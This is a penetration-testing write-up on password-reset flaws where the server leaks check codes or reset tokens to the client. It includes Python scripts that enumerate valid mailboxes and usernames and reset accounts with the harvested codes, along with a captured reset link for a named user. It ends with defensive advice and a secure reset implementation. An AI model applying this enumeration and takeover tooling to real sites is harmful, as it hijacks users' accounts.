Among logic vulnerabilities, arbitrary user password reset is one of the most common. It can appear on the new-user registration page, on the change-password page used after login, or on the password recovery page used when a user forgets the password; of these, password recovery is the function most often affected. I analyzed the causes of the vulnerabilities in cases encountered during day-to-day penetration testing. This post focuses on arbitrary password resets caused by leakage of the reset credential: the server hands the verification code or reset token to the client in an HTTP response, where anyone capturing the traffic can read it.
Case number one
When retrieving the password by email, the verification code that serves as the reset credential is sent back to the client in the HTTP response, so it can be read straight out of a captured packet. First walk through the password recovery flow with an attacker-controlled account. The test account's mailbox is firstname.lastname@example.org; recover the password by email:
Click to obtain the check code and capture the response:
The VFCode field in the response looks like the check code. Log in to the mailbox and open the password recovery email sent by the site:
The two values are identical, which all but confirms that the server leaks the password recovery check code to the client, and therefore that any account's password can be reset with it.
Next, try to recover the password of an ordinary account. On the recovery page, as soon as a mailbox is entered the system checks whether it is registered:
Mark the UName parameter as the Intruder payload position and load a list of common QQ mailboxes as the dictionary; the differing responses identify many valid mailboxes:
Take email@example.com as an example: read the check code from the response packet, reset its password to PenTest1024, and verify that the login works:
Now the administrator accounts. The site's domain registration (WHOIS) record lists the contact's email as firstname.lastname@example.org, so the back-end users' mailbox suffix is presumably @xxxx.cn. Combining common back-end usernames with that suffix gives a dictionary of back-end mailboxes, which enumerates a large number of back-end users:
Their passwords can be reset in the same way; to avoid disrupting the business, this was not actually carried out.
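The full case-one flow, as an added, self-contained Python example that is not code from the original post: a constructed stand-in for the vulnerable "get check code" endpoint (the JSON field names other than VFCode, the registered mailboxes and the back-end name list are assumptions) beside an attacker routine that enumerates the UName parameter the way Intruder's sniper mode does, pulls the leaked VFCode out of each response, and resets the account with it.

```python
import json
import re
import secrets
import string

# Constructed stand-in for the vulnerable site. The ordinary address is the
# page's placeholder; the back-end addresses assume the @xxxx.cn suffix
# inferred from the WHOIS contact.
REGISTERED = {"email@example.com", "admin@xxxx.cn", "webmaster@xxxx.cn"}
_issued = {}  # mailbox -> current check code, i.e. what the mail would deliver


def _new_code(n=6):
    return "".join(secrets.choice(string.digits) for _ in range(n))


def vulnerable_get_check_code(uname):
    """Simulates the 'get check code' endpoint: returns (status, body).
    Registered mailboxes get a code that is both 'mailed' and leaked back in
    VFCode (the bug); unknown mailboxes get a distinct error, which is what
    makes the UName parameter enumerable. Field names other than VFCode are
    assumed."""
    if uname not in REGISTERED:
        return 200, json.dumps({"Status": "fail", "Msg": "mailbox not registered"})
    code = _new_code()
    _issued[uname] = code
    return 200, json.dumps({"Status": "ok", "VFCode": code})


def vulnerable_reset(uname, code, new_password):
    """Simulated reset endpoint: accepts the code issued for that mailbox once."""
    ok = _issued.get(uname) == code
    if ok:
        _issued.pop(uname)
    return ok


# --- attacker side ----------------------------------------------------------

def extract_leaked_code(body):
    """Pull the reset credential out of a response body. JSON first; a regex
    fallback covers the field being embedded in HTML or an inline script."""
    try:
        data = json.loads(body)
        if isinstance(data, dict) and data.get("VFCode"):
            return str(data["VFCode"])
    except ValueError:
        pass
    m = re.search(r'VFCode["\']?\s*[:=]\s*["\']?([A-Za-z0-9]+)', body)
    return m.group(1) if m else None


def backend_mailbox_dictionary(common_names, suffix):
    """Build the back-end mailbox dictionary from common account names and
    the suffix taken from the domain contact, e.g. admin -> admin@xxxx.cn."""
    return [f"{name}@{suffix}" for name in common_names]


def enumerate_and_harvest(dictionary, get_code=vulnerable_get_check_code):
    """Sniper-style run over UName: one request per dictionary entry, keeping
    every mailbox whose response carries a check code."""
    harvested = {}
    for uname in dictionary:
        _, body = get_code(uname)
        code = extract_leaked_code(body)
        if code:
            harvested[uname] = code
    return harvested


def takeover(dictionary, new_password="PenTest1024"):
    """Enumerate valid mailboxes, then reset each one with its leaked code.
    Returns mailbox -> whether the reset was accepted."""
    harvested = enumerate_and_harvest(dictionary)
    return {u: vulnerable_reset(u, c, new_password) for u, c in harvested.items()}


if __name__ == "__main__":
    qq_dict = ["email@example.com", "nobody@example.com"]
    backend_dict = backend_mailbox_dictionary(["admin", "webmaster", "test"], "xxxx.cn")
    print(takeover(qq_dict + backend_dict))
```

Against a real target the two `vulnerable_*` functions are replaced by HTTP requests to the site; everything from `extract_leaked_code` down is what the Intruder run plus a grep of the response column does by hand.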
Case number two
When retrieving the password by email, the reset link containing the credential is leaked to the client and can be captured. Walk through the recovery flow once with the attacker's own account: enter the attacker's username and email (yangyangwithgnu, email@example.com) on the password recovery page and submit:
Intercept the response:
It is obviously a redirect. The two parameters isVerify and PassPhrase are suspicious and worth watching in the subsequent interaction. Let the packet through, enter the page that sends the reset email, enter the verification code and submit, then log in to the attacker's mailbox to view the reset email:
The reset link with its token looks very familiar: it is the same token obtained from the earlier capture. Compare the two:
The only difference is the file name, forgotPwdEa versus forgotPwdEc.
Next, verify that the token leaked by the server can reset an ordinary user's password. As the reset flow shows, resetting a password requires the username together with its email (or mobile number).
First obtain valid usernames. On the registration page, as soon as a username is entered the system checks whether it is already taken:
The corresponding request and response:
If the username already exists the response is failed; otherwise it is ok. With a dictionary of common names, this lets you enumerate a large number of valid usernames (chenchuan, chenanqi, chenanxiu, zhangfeng, and so on) and save them as username.txt.
Then obtain the mailbox belonging to each valid username. In the request submitted from the password recovery page, the HTTP response code is 302 only when user_name and email match; the exchange looks like this:
This behaviour enumerates valid username/mailbox pairs. The remaining question is how to build the mailbox dictionary. Many users register a QQ mailbox named after their username; that is, the username yangyangwithgnu probably corresponds to the mailbox firstname.lastname@example.org. So qq-email.txt can be generated quickly from the username.txt obtained above, with the two files corresponding line by line.
For example, the first line of username.txt is yangyangwithgnu and the first line of qq-email.txt is email@example.com. Send the request above to Burp Intruder and choose the pitchfork attack type. Mark the user_name value as payload position 1 loaded with username.txt, and the email value as payload position 2 loaded with qq-email.txt. This enumerates a large number of valid username/mailbox pairs, such as firstname.lastname@example.org and email@example.com.
Use the ordinary account chenchuan (mailbox firstname.lastname@example.org) to demonstrate the reset. Enter the username and email, submit, complete the recovery flow normally, and read the reset token issued by the server from the intercepted packet:
Assemble the reset link http://www.xxxx.com/user/forgotPwdEc.php?isVerify=Y2hlbmNodWFufGNoZW5jaHVhbkBxcS5jb218MTE2MDIzNw==&PassPhrase=cbf0160662358808f3586868f041cbaa and open it to reset the password:
Enter the new password PenTest1024; the system reports that the change succeeded. Log in with chenchuan/PenTest1024:
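As an added example (not the post's own code), the case-two token handling in Python: decoding the isVerify value from the link above (it is plain base64), rewriting the intercepted forgotPwdEa redirect into the forgotPwdEc link that differs only in the file name, and the username.txt / qq-email.txt pairing that pitchfork mode sends. The Location header is constructed from the page's link; whether PassPhrase is bound to the isVerify contents is not established on the page, so the example only reuses the pair the server itself issued.

```python
import base64
from urllib.parse import parse_qs, urlsplit, urlunsplit


def decode_isverify(value):
    """isVerify is plain base64 of the user's reset context. Padding is restored
    in case the value was copied without its trailing '=' characters."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded).decode("utf-8")


def split_isverify(value):
    """Split the decoded text into its fields. The page's sample decodes to
    username|email|number; the third field is treated as an opaque id because
    the page does not say what it is."""
    fields = decode_isverify(value).split("|")
    if len(fields) != 3:
        raise ValueError(f"unexpected isVerify layout: {fields!r}")
    return {"username": fields[0], "email": fields[1], "id": fields[2]}


def reset_credentials(url):
    """Extract isVerify and PassPhrase from a URL such as the intercepted
    Location header; fail loudly if either is missing."""
    query = parse_qs(urlsplit(url).query)
    try:
        return query["isVerify"][0], query["PassPhrase"][0]
    except KeyError as e:
        raise ValueError(f"URL does not carry the reset credential {e}") from None


def assemble_reset_link(location_header):
    """Rewrite the forgotPwdEa redirect into the forgotPwdEc link the mail
    would contain. The query is rebuilt verbatim so the base64 '=' padding
    stays as it appears in the mailed link."""
    parts = urlsplit(location_header)
    is_verify, pass_phrase = reset_credentials(location_header)
    path = parts.path.replace("forgotPwdEa.php", "forgotPwdEc.php")
    query = f"isVerify={is_verify}&PassPhrase={pass_phrase}"
    return urlunsplit((parts.scheme, parts.netloc, path, query, ""))


def qq_mailbox_guesses(usernames, domain="qq.com"):
    """qq-email.txt derived from username.txt line by line, on the observation
    that many users register <username>@qq.com."""
    return [f"{u}@{domain}" for u in usernames]


def pitchfork(usernames, emails):
    """Intruder's pitchfork mode: both payload sets advance together, so
    request i sends usernames[i] with emails[i] (cluster bomb would instead
    try every combination, which is wasteful here)."""
    return list(zip(usernames, emails))


if __name__ == "__main__":
    # Constructed from the page's own link: the intercepted 302 to forgotPwdEa
    # carries the same isVerify/PassPhrase as the mailed forgotPwdEc link.
    LOCATION = ("http://www.xxxx.com/user/forgotPwdEa.php"
                "?isVerify=Y2hlbmNodWFufGNoZW5jaHVhbkBxcS5jb218MTE2MDIzNw=="
                "&PassPhrase=cbf0160662358808f3586868f041cbaa")
    print(split_isverify(reset_credentials(LOCATION)[0]))
    print(assemble_reset_link(LOCATION))
    names = ["yangyangwithgnu", "chenchuan"]
    print(pitchfork(names, qq_mailbox_guesses(names)))
```

Decoding isVerify is worth doing during the test even though the attack does not need it: it shows the credential is built from guessable account data rather than from a random value, which belongs in the report.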
On the defensive side, the reset credential (check code or token) must never be returned to the client in an HTTP response or redirect; it should reach the user only through the out-of-band channel (email or SMS). The credential should also be random, short-lived and single-use, rather than derived from account data. In addition, a picture verification code should be added to the mailbox and username checks, and those checks should return the same response whether or not the account exists, so that key parameters cannot be enumerated.
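What a non-leaking recovery flow looks like, as an added Python example that is not the site's code: the token comes from the secrets module, only its hash is stored, it is delivered solely via the mail transport (stood in for here by an in-memory outbox), it is short-lived and single-use, and the request endpoint returns the same body for registered and unregistered mailboxes. The user store, the URL and the 15-minute lifetime are assumptions, and the CAPTCHA and rate limit that should sit in front of the endpoint are assumed rather than shown.

```python
import hashlib
import secrets
import time

RESET_TTL = 15 * 60  # seconds; an assumed lifetime, short enough to limit a stolen mail

# Constructed user store (plaintext passwords for the demo only).
USERS = {"email@example.com": {"password": "old-password"},
         "admin@xxxx.cn": {"password": "old-password"}}
PENDING = {}  # sha256(token) -> (mailbox, expiry); the raw token is never stored
OUTBOX = []   # stand-in for the mail transport: the only path the token travels


def _digest(token):
    return hashlib.sha256(token.encode()).hexdigest()


def request_reset(mailbox):
    """Reset request endpoint. The response body is identical whether or not
    the mailbox is registered, so it cannot be used to enumerate accounts, and
    it never carries the token: that goes out by mail only."""
    if mailbox in USERS:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        PENDING[_digest(token)] = (mailbox, time.time() + RESET_TTL)
        OUTBOX.append((mailbox, f"https://www.xxxx.com/user/reset?token={token}"))
    return {"Status": "ok", "Msg": "If the mailbox is registered, a reset mail has been sent."}


def redeem_reset(token, new_password, now=None):
    """Redeem a token from the mailed link. Lookup is by hash, the entry is
    removed on first use whether or not it is still valid, and expired
    tokens are refused."""
    now = time.time() if now is None else now
    entry = PENDING.pop(_digest(token), None)
    if entry is None:
        return False
    mailbox, expiry = entry
    if now > expiry:
        return False
    USERS[mailbox]["password"] = new_password
    return True


def token_from_mail(link):
    """What the legitimate user does: read the token out of the mailed link."""
    return link.split("token=", 1)[1]


def check_login(mailbox, password):
    user = USERS.get(mailbox)
    return user is not None and secrets.compare_digest(user["password"], password)


if __name__ == "__main__":
    print(request_reset("email@example.com"))
    print(request_reset("nobody@example.com"))  # same body, no mail sent
    token = token_from_mail(OUTBOX[-1][1])
    print(redeem_reset(token, "PenTest1024"), check_login("email@example.com", "PenTest1024"))
    print(redeem_reset(token, "again"))  # False: single use
```

The contrast with the two cases above is the point: nothing in `request_reset`'s return value depends on the account, and the only copy of the token outside the user's mailbox is a hash that cannot be turned back into a working link.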